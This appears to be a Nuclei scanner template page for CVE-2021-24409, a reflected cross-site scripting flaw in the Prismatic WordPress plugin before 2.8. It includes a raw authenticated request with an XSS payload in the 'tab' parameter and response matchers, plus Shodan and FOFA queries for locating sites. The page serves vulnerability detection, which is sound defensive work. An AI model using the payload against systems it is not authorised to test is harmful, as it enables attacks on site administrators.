Skip to content
Nuclei Templates

Prismatic < 2.8 - Cross-Site Scripting

ID: CVE-2021-24409

Severity: medium

Author: Harsh

Tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet

Description

Section titled “Description”

The plugin does not escape the ‘tab’ GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator

YAML Source

Section titled “YAML Source”
id: CVE-2021-24409


info:
  name: Prismatic < 2.8 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
  remediation: Fixed in version 2.8
  reference:
    - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24409
    cwe-id: CWE-79
    epss-score: 0.00171
    epss-percentile: 0.54048
    cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugin-planet
    product: prismatic
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/prismatic
    fofa-query: body=/wp-content/plugins/prismatic
    publicwww-query: "/wp-content/plugins/prismatic"
  tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "Leave A Review?")'
          - 'contains(body_2, "onanimationend=alert(document.domain)")'
        condition: and
# digest: 490a0046304402201aab86ae39c91d22ff4694011a714816d05f3f1f1b8c245621b9b0dcd87f5a040220538a028e1a7514ce3dd49b72806e017457efbc4847e3f70eab77d80af34de167:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24409.yaml"

View on Github